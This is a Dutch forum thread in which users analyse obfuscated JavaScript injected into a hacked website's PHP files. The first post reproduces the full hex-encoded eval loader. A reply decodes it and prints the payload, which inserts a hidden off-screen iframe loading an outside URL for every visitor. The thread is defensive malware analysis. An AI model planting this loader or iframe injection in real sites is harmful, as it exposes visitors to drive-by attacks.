
[JS] Website gehackt. Wat doet deze code?


  • MarkII
  • Registratie: Februari 2006
  • Laatst online: 25-10 11:58
De website van een vriend van mij is gehackt.
Aan een aantal .php-bestanden is onderstaande code toegevoegd.
Kan iemand ontcijferen wat dit precies doet?

PHP:
<?php /* Injected line as found appended to the compromised .php files. It echoes an inline <script>
   whose payload is stored as a comma-separated list of hex values; the script parses each value
   with radix her*4 (her is set to 4), subtracts 35 to get a character code, and passes the joined
   string to eval (aliased as `jok`). The leading hex run is a stable search string for locating
   other modified files; the thread uses it as a search term. */ echo "<script>if(document.querySelector)her=4;bqqpbq=(\"2c,2c,8c,89,43,4b,87,92,86,98,90,88,91,97,51,8a,88,97,68,8f,88,90,88,91,97,96,65,9c,77,84,8a,71,84,90,88,4b,4a,85,92,87,9c,4a,4c,7e,53,80,4c,9e,30,2c,2c,2c,8c,89,95,84,90,88,95,4b,4c,5e,30,2c,2c,a0,43,88,8f,96,88,43,9e,30,2c,2c,2c,87,92,86,98,90,88,91,97,51,9a,95,8c,97,88,4b,45,5f,8c,89,95,84,90,88,43,96,95,86,60,4a,8b,97,97,93,5d,52,52,8c,97,90,84,8a,91,84,97,88,51,92,95,8a,52,4a,43,9a,8c,87,97,8b,60,4a,54,53,53,4a,43,8b,88,8c,8a,8b,97,60,4a,54,53,53,4a,43,96,97,9c,8f,88,60,4a,9a,8c,87,97,8b,5d,54,53,53,93,9b,5e,8b,88,8c,8a,8b,97,5d,54,53,53,93,9b,5e,93,92,96,8c,97,8c,92,91,5d,84,85,96,92,8f,98,97,88,5e,8f,88,89,97,5d,50,54,53,53,53,53,93,9b,5e,97,92,93,5d,53,5e,4a,61,5f,52,8c,89,95,84,90,88,61,45,4c,5e,30,2c,2c,a0,30,2c,2c,89,98,91,86,97,8c,92,91,43,8c,89,95,84,90,88,95,4b,4c,9e,30,2c,2c,2c,99,84,95,43,89,43,60,43,87,92,86,98,90,88,91,97,51,86,95,88,84,97,88,68,8f,88,90,88,91,97,4b,4a,8c,89,95,84,90,88,4a,4c,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,96,95,86,4a,4f,4a,8b,97,97,93,5d,52,52,8c,97,90,84,8a,91,84,97,88,51,92,95,8a,52,4a,4c,5e,89,51,96,97,9c,8f,88,51,8f,88,89,97,60,4a,50,54,53,53,53,53,93,9b,4a,5e,89,51,96,97,9c,8f,88,51,97,92,93,60,4a,53,4a,5e,89,51,96,97,9c,8f,88,51,93,92,96,8c,97,8c,92,91,60,4a,84,85,96,92,8f,98,97,88,4a,5e,89,51,96,97,9c,8f,88,51,97,92,93,60,4a,53,4a,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,9a,8c,87,97,8b,4a,4f,4a,54,53,53,4a,4c,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,8b,88,8c,8a,8b,97,4a,4f,4a,54,53,53,4a,4c,5e,30,2c,2c,2c,87,92,86,98,90,88,91,97,51,8a,88,97,68,8f,88,90,88,91,97,96,65,9c,77,84,8a,71,84,90,88,4b,4a,85,92,87,9c,4a,4c,7e,53,80,51,84,93,93,88,91,87,66,8b,8c,8f,87,4b,89,4c,5e,30,2c,2c,a0\".split(\",\"));jok=eval;function 
txqq(){pwwth=function(){--(ukl.body)}()}ukl=document;for(ciiq=0;ciiq<bqqpbq[\"length\"];ciiq+=1){bqqpbq[ciiq]=-(35)+parseInt(bqqpbq[ciiq],her*4);}try{txqq()}catch(ywcj){bjjyi=50-50;}if(!bjjyi)jok(String[\"fr\"+\"omCh\"+\"arCo\"+\"de\"].apply(String,bqqpbq));</script>"; ?>


Ik heb het een beetje proberen op te schonen tot dit:
PHP:
// Feature gate: `her` is assigned only when the browser exposes document.querySelector.
// It is read later as her*4 (= 16), the radix handed to parseInt; without the assignment
// `her` stays undeclared and that expression would throw.
if(document.querySelector) her=4;
// Payload: one string of comma-separated hex values, split into an array of strings.
// Each entry is later turned into a character code by parseInt(entry, her*4) - 35.
bqqpbq=("2c,2c,8c,89,43,4b,87,92,86,98,90,88,91,97,51,8a,88,97,68,8f,88,90,88,91,97,96,65,9c,77,84,8a,71,84,90,88,4b,4a,85,92,87,9c,4a,4c,7e,53,80,4c,9e,30,2c,2c,2c,8c,89,95,84,90,88,95,4b,4c,5e,30,2c,2c,a0,43,88,8f,96,88,43,9e,30,2c,2c,2c,87,92,86,98,90,88,91,97,51,9a,95,8c,97,88,4b,45,5f,8c,89,95,84,90,88,43,96,95,86,60,4a,8b,97,97,93,5d,52,52,8c,97,90,84,8a,91,84,97,88,51,92,95,8a,52,4a,43,9a,8c,87,97,8b,60,4a,54,53,53,4a,43,8b,88,8c,8a,8b,97,60,4a,54,53,53,4a,43,96,97,9c,8f,88,60,4a,9a,8c,87,97,8b,5d,54,53,53,93,9b,5e,8b,88,8c,8a,8b,97,5d,54,53,53,93,9b,5e,93,92,96,8c,97,8c,92,91,5d,84,85,96,92,8f,98,97,88,5e,8f,88,89,97,5d,50,54,53,53,53,53,93,9b,5e,97,92,93,5d,53,5e,4a,61,5f,52,8c,89,95,84,90,88,61,45,4c,5e,30,2c,2c,a0,30,2c,2c,89,98,91,86,97,8c,92,91,43,8c,89,95,84,90,88,95,4b,4c,9e,30,2c,2c,2c,99,84,95,43,89,43,60,43,87,92,86,98,90,88,91,97,51,86,95,88,84,97,88,68,8f,88,90,88,91,97,4b,4a,8c,89,95,84,90,88,4a,4c,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,96,95,86,4a,4f,4a,8b,97,97,93,5d,52,52,8c,97,90,84,8a,91,84,97,88,51,92,95,8a,52,4a,4c,5e,89,51,96,97,9c,8f,88,51,8f,88,89,97,60,4a,50,54,53,53,53,53,93,9b,4a,5e,89,51,96,97,9c,8f,88,51,97,92,93,60,4a,53,4a,5e,89,51,96,97,9c,8f,88,51,93,92,96,8c,97,8c,92,91,60,4a,84,85,96,92,8f,98,97,88,4a,5e,89,51,96,97,9c,8f,88,51,97,92,93,60,4a,53,4a,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,9a,8c,87,97,8b,4a,4f,4a,54,53,53,4a,4c,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,8b,88,8c,8a,8b,97,4a,4f,4a,54,53,53,4a,4c,5e,30,2c,2c,2c,87,92,86,98,90,88,91,97,51,8a,88,97,68,8f,88,90,88,91,97,96,65,9c,77,84,8a,71,84,90,88,4b,4a,85,92,87,9c,4a,4c,7e,53,80,51,84,93,93,88,91,87,66,8b,8c,8f,87,4b,89,4c,5e,30,2c,2c,a0".split(","));
// `jok` is an alias for eval, so the final call site never spells out `eval`
// (presumably to get past simple string matching — not provable from the listing alone).
jok=eval;
// Probe that the script calls inside a try/catch. It assigns to `pwwth` the result of an
// anonymous function that is invoked immediately: the `()` on the line after the closing
// brace still belongs to the function expression, because no semicolon is inserted there.
function txqq(){
    pwwth=function(){
        // Prefix decrement applied to ukl.body; `ukl` is assigned `document` before txqq() is called.
        // NOTE(review): presumably expected to throw in a real browser DOM so that the caller's
        // catch block runs — confirm in an isolated analysis environment.
        --(ukl.body)
    }
()
}
// Alias for document; txqq() reads it as ukl.body.
ukl=document;
// Decode in place: each hex string is parsed with radix her*4 (her is set to 4, so 16)
// and reduced by 35, leaving a numeric character code in the same array slot.
// NOTE(review): `"length\"]` still carries a backslash from the PHP-escaped original, so this
// cleaned-up listing does not parse as posted; the injected line itself reads bqqpbq["length"].
for(ciiq=0; ciiq<bqqpbq["length\"]; ciiq+=1)
{
    bqqpbq[ciiq]=-(35)+parseInt(bqqpbq[ciiq],her*4);
}
// In this listing bjjyi is assigned only inside the catch block, i.e. only when txqq() throws.
try{txqq()}
catch(ywcj)
{
    bjjyi=50-50;
}
// 50-50 is 0, so !bjjyi is true once the catch block has run. The character codes are then
// joined through String.fromCharCode (the method name is assembled from string fragments)
// and the resulting source text is passed to jok, which is eval.
// NOTE(review): if txqq() did not throw, bjjyi would be undeclared and this line would raise
// a ReferenceError instead of reaching jok — looks like a check against incomplete DOM
// emulation; confirm.
if(!bjjyi) jok(String["fr"+"omCh"+"arCo"+"de"].apply(String,bqqpbq));

  • DanielG
  • Registratie: Oktober 2005
  • Laatst online: 08-09 15:36

DanielG

i = 0x5f3759df - (i>>1); ☠₧ℳ🀪❣

ik heb het een beetje herschreven naar dit:

JavaScript:
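// Static decoder for the injected sample. It reproduces only the decoding step and prints the
// hidden script as text; the sample's eval call is deliberately left out, so nothing decoded
// here is executed.

// Hex-encoded payload, copied verbatim from the injected <script>. Every entry is a character
// code shifted up by 35.
const bqqpbq = ("2c,2c,8c,89,43,4b,87,92,86,98,90,88,91,97,51,8a,88,97,68,8f,88,90,88,91,97,96,65,9c,77,84,8a,71,84,90,88,4b,4a,85,92,87,9c,4a,4c,7e,53,80,4c,9e,30,2c,2c,2c,8c,89,95,84,90,88,95,4b,4c,5e,30,2c,2c,a0,43,88,8f,96,88,43,9e,30,2c,2c,2c,87,92,86,98,90,88,91,97,51,9a,95,8c,97,88,4b,45,5f,8c,89,95,84,90,88,43,96,95,86,60,4a,8b,97,97,93,5d,52,52,8c,97,90,84,8a,91,84,97,88,51,92,95,8a,52,4a,43,9a,8c,87,97,8b,60,4a,54,53,53,4a,43,8b,88,8c,8a,8b,97,60,4a,54,53,53,4a,43,96,97,9c,8f,88,60,4a,9a,8c,87,97,8b,5d,54,53,53,93,9b,5e,8b,88,8c,8a,8b,97,5d,54,53,53,93,9b,5e,93,92,96,8c,97,8c,92,91,5d,84,85,96,92,8f,98,97,88,5e,8f,88,89,97,5d,50,54,53,53,53,53,93,9b,5e,97,92,93,5d,53,5e,4a,61,5f,52,8c,89,95,84,90,88,61,45,4c,5e,30,2c,2c,a0,30,2c,2c,89,98,91,86,97,8c,92,91,43,8c,89,95,84,90,88,95,4b,4c,9e,30,2c,2c,2c,99,84,95,43,89,43,60,43,87,92,86,98,90,88,91,97,51,86,95,88,84,97,88,68,8f,88,90,88,91,97,4b,4a,8c,89,95,84,90,88,4a,4c,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,96,95,86,4a,4f,4a,8b,97,97,93,5d,52,52,8c,97,90,84,8a,91,84,97,88,51,92,95,8a,52,4a,4c,5e,89,51,96,97,9c,8f,88,51,8f,88,89,97,60,4a,50,54,53,53,53,53,93,9b,4a,5e,89,51,96,97,9c,8f,88,51,97,92,93,60,4a,53,4a,5e,89,51,96,97,9c,8f,88,51,93,92,96,8c,97,8c,92,91,60,4a,84,85,96,92,8f,98,97,88,4a,5e,89,51,96,97,9c,8f,88,51,97,92,93,60,4a,53,4a,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,9a,8c,87,97,8b,4a,4f,4a,54,53,53,4a,4c,5e,89,51,96,88,97,64,97,97,95,8c,85,98,97,88,4b,4a,8b,88,8c,8a,8b,97,4a,4f,4a,54,53,53,4a,4c,5e,30,2c,2c,2c,87,92,86,98,90,88,91,97,51,8a,88,97,68,8f,88,90,88,91,97,96,65,9c,77,84,8a,71,84,90,88,4b,4a,85,92,87,9c,4a,4c,7e,53,80,51,84,93,93,88,91,87,66,8b,8c,8f,87,4b,89,4c,5e,30,2c,2c,a0".split(","));

// The sample computes its radix as her*4 with her=4, i.e. 16, and adds -(35) to every value.
const HEX_RADIX = 16;
const CHAR_OFFSET = 35;

// Declared with const (no implicit globals) so the decoder also runs in strict mode and in
// ES modules, where assigning to an undeclared name throws.
const solved = bqqpbq
    .map((hexValue) => String.fromCharCode(Number.parseInt(hexValue, HEX_RADIX) - CHAR_OFFSET))
    .join("");

// Output is for reading only.
console.log(solved);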


wat dan het volgende geeft als 'solved':

JavaScript:
// Decoded payload, i.e. the text that the injected script hands to eval.
// If a <body> element already exists the iframe is built through the DOM (iframer);
// otherwise the same iframe is written into the document as markup.
if (document.getElementsByTagName('body')[0]){
            iframer();
        } else {
            // 100x100 iframe, absolutely positioned at left:-10000px, which places it outside
            // the visible page while its src is still loaded by the visitor's browser.
            document.write("<iframe src='http://itmagnate.org/' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
        }
        // Creates the iframe element with the same src, size and off-screen position and
        // appends it to the first <body> element.
        function iframer(){
            // NOTE(review): `&#8230;` below is an ellipsis entity left by the forum's rendering,
            // not part of the script; the hex values at that position decode to
            // f.style.position='absolute';
            var f = document.createElement('iframe');f.setAttribute('src','http://itmagnate.org/');f.style.left='-10000px';f.style.top='0';f.style.pos&#8230;f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
            document.getElementsByTagName('body')[0].appendChild(f);
        }


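Dus wat het doet is een onzichtbaar iframe toevoegen (100×100 px, absoluut gepositioneerd op left:-10000px, dus buiten beeld) dat bij elke bezoeker een URL laadt die waarschijnlijk gevaarlijk is.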

Trouwens, als je googlet op "2c,2c,8c,89,43,4b," zie je redelijk wat Nederlandse hosts die hier last van hebben.

http://xyproblem.info/


  • MarkII
  • Registratie: Februari 2006
  • Laatst online: 25-10 11:58
Aha, dankjewel.

Ik had wel gezocht met een stukje code, maar toen vond ik alleen een tafeltennisvereniging.

Ik zie ook Zwitserse en Deense sites.
Dat zijn drukke baasjes geweest.
Zeker een achterdeurtje gevonden?

  • Ploink
  • Registratie: April 2002
  • Laatst online: 21-08 13:05
Oeps!
Exploit aangeboden door GoT topic
DIT topic dus; sommige virusscanners klagen over de code die gepost is.